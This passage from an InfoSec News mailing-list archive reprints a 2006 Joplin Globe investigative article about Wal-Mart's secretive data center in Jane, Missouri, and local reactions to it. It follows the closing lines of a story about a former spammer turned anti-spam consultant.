is put into stopping it. The settlements with Microsoft and the
Attorney General's Office have been a serious reality check: harsh but
good, and in the public's best interest."

He added: "I am pleased to announce that I am now a part of the
anti-spam community, having started an Internet security company that
offers my clients advice on systems to protect against spam. I'm now
working earnestly to help other entrepreneurs avoid the traps that
deceived me and led me to make questionable business choices."

Will Sturgeon of Silicon.com reported from London.




From isn at c4i.org  Tue Jun  6 06:03:03 2006
From: isn at c4i.org (InfoSec News)
Date: Tue, 6 Jun 2006 05:03:03 -0500 (CDT)
Subject: [ISN] Wal-Mart's data center remains mystery
Message-ID: <Pine.LNX.4.44.0606060502090.3853-100000@idle.curiosity.org>

http://www.joplinglobe.com/local/local_story_148015054/

By Max McCoy
The Joplin Globe 
Globe Investigative Writer
May 28, 2006 

JANE, Mo. - Call it Area 71.

Behind a fence topped with razor wire just off U.S. Highway 71 is a
bunker of a building that Wal-Mart considers so secret that it won't
even let the county assessor inside without a nondisclosure agreement.

The 125,000-square-foot building, tucked behind a new Wal-Mart
Supercenter, is only a stone's throw from the Arkansas line and about
15 miles from corporate headquarters in Bentonville, Ark.

There is nothing about the building to give even a hint that Wal-Mart
owns it.

Despite the glimpses through the fence of manicured grass and
carefully placed trees, the overall impression is that this is a
secure site that could withstand just about anything. Earth is packed
against the sides. The green roof - meant, perhaps, to blend into the
surrounding Ozarks hills - bristles with dish antennas. On one of the
heavy steel gates at the guardhouse is a notice that visitors must use
the intercom for assistance.

What the building houses is a mystery.

Speculation

Wal-Mart's ability to crunch numbers is a favorite of conspiracy
theorists, and its data centers are the corporate counterpart to Area
51 at Groom Lake in the state of Nevada. According to one consumer
activist, Katherine Albrecht, even the wildest conspiracy buff might
be surprised at just how much Wal-Mart knows about its customers - and
how much more it would like to know.

"We were contacted about two years ago by somebody who runs a security
company that had been asked in a request for proposals for ways they
could link video footage with customers paying for their purchases,"  
Albrecht said. "Wal-Mart would actually be able to view photos and
video of customers paying, say, for a pack of gum. At the time, it
struck me as unbelievably outlandish because of the amount of data
storage required."

But Wal-Mart, according to a 2004 New York Times article, had enough
storage capacity to contain twice the amount of all the information
available on the Internet. For the technically minded, the exact
amount was for 460 terabytes of data. The prefix tera comes from the
Greek word for monster, and a terabyte is a trillion bytes, the basic
unit of computer storage.

Albrecht, founder of Consumers Against Supermarket Privacy Invasion
and Numbering, said she never could confirm the contractor's story.  
That is not surprising, since Wal-Mart seldom comments on its data
capabilities and operations.

A Globe request for information about the Jane data center was
referred at Wal-Mart headquarters to Carrie Thum, a senior information
officer and former lobbyist for the retailer.

"This is not something that we discuss publicly," Thum said. "We have
no comment. And that's off the record."

Skeleton crew
 
The Jane data center is an enigmatic icon to the power of data, which
has helped Wal-Mart become the largest retailer in the world, and to
the corporation's growing secrecy since founder Sam Walton's death in
1992. When Wal-Mart constructed its primary data center at corporate
headquarters in 1989, it wasn't much of a secret: It was the largest
poured concrete structure in Arkansas at the time, and Walton himself
ordered a third story.

"Not only had we completely designed it, we were under construction,"  
said Bill Ferguson, a founder of Askew Nixon Ferguson Architects in
Memphis, Tenn. "They were pouring foundations, and Sam walked across
the parking lot one Friday at the end of the day and said, 'You know,
let's add a third floor and put some people up there.'"

Ferguson said the Bentonville data center is built on bedrock and is
designed to withstand most natural and man-made disasters, but is not
impregnable. The biggest danger, he said, is the area's frequently
violent thunderstorms.

"We studied making it tornado-proof, which is difficult," he said. "We
calculated the probability of a category 5 tornado hitting it, which
was less likely than an airplane crashing into it head-on. At the
time, they decided not to."

Since then, Ferguson said, changes have been made to increase the
integrity of the structure. The data center was designed with backup
generators, fuel on site, and room and board for a skeleton crew in
the event an emergency required an extended stay.

Ferguson said his firm learned to design data centers by working with
FedEx, which also is based in Memphis, and that the 1989 Wal-Mart data
center was built so that it could communicate via any means available
- including copper wire, fiber optics and satellites.

The firm no longer works with Wal-Mart, and Ferguson said he had no
knowledge of the design or purpose of the data center in Jane. But he
suggested that Jim Liles, a Memphis engineer, might know.

Liles said he was a consultant on the Jane project, and that Crossland
Construction was the contractor, but he was reluctant to say much
else. "As far as what its purpose is, all that has to come from
Wal-Mart," Liles said.

Crossland Construction, based in Columbus, Kan., said Tim Oelke of the
company's Rogers, Ark., office had been in charge. Oelke did not
return a phone call seeking comment.

'Never saw a plan'

The data center was completed in 2004 and was part of a project that
included the Supercenter, which opened early last year, and a
warehouse. The resulting economic impact on McDonald County, known for
its rolling hills and lazy rivers, is difficult to underestimate, said
Rusty Enlow.

"Just a few years ago, one new store would have been a big deal,"  
Enlow said. "And I'm not talking about a Supercenter. Just a gas
station would have generated excitement."

Now, Enlow said, the county's tax base has doubled, and land is going
for about $2,100 an acre, about twice what it was before the project
was announced in 2001.

Enlow is chairman of the county planning commission, a body created by
popular vote in 1964 but which had not met until this month. Enlow
said he doesn't know why the commission never met, but he believes it
was because whatever problem prompted its creation was solved before
the board was appointed. He also said he's not sure the planning
commission has any real authority, or would want any (there is no
zoning in the county), but that he and the other 18 members are eager
to bring even more business into the county.

"It seems with the opening of that store there has just been a lot of
activity," he said. "McDonald County has always been a poor county,
but we are in an excellent position now. We're a friendly place, and
we're open to things."
 
Wal-Mart, Enlow said, had created a business synergy that was helping
the county of 22,000 shed its hillbilly stereotype.

Enlow was director of the McDonald County Economic Development Council
when Wal-Mart quietly began scouting for land. Only after the land had
been bought south of the then-unincorporated community of Jane was it
announced that the project was Wal-Mart's, and even then, plans for
the data center were closely held.

"I never even saw a plan on it," Enlow said.

But Enlow said he watched during the construction of the data center,
and that it appeared to be a single-story building that was built
"like a bunker," with mounds of earth piled against the sides. He
later was told that it would employ 15 to 20 people, and that the
building was for data storage.

To facilitate the project, the Missouri Department of Transportation
agreed to widen Highway 71 to four lanes from Jane to the Arkansas
line; a grant was used to expand the public water district; and the
Army Corps of Engineers approved a request to fill in a small portion
of wetland along Bear Hollow Road.

Meanwhile, the village of Jane incorporated.

In April 2005, Wal-Mart used the 160,000-square-foot Supercenter to
demonstrate its micro-merchandising capabilities as part of a media
conference. Employees demonstrated hand-held Telxon (pronounced
Tel-zon) computers, which resemble hand scanners but hold a year's
worth of a particular store's sales history on every item. The devices
help store managers decide what to stock.

Bananas are Wal-Mart's best-selling produce product nationwide, but at
Jane, the top seller was lettuce, Supermarket News reported after the
event.

'Secretive'

Bill Wilson, McDonald County presiding commissioner, said he has never
been inside the green-roofed data center, and that to his knowledge,
only one county official has: Assessor Laura Pope.

"I had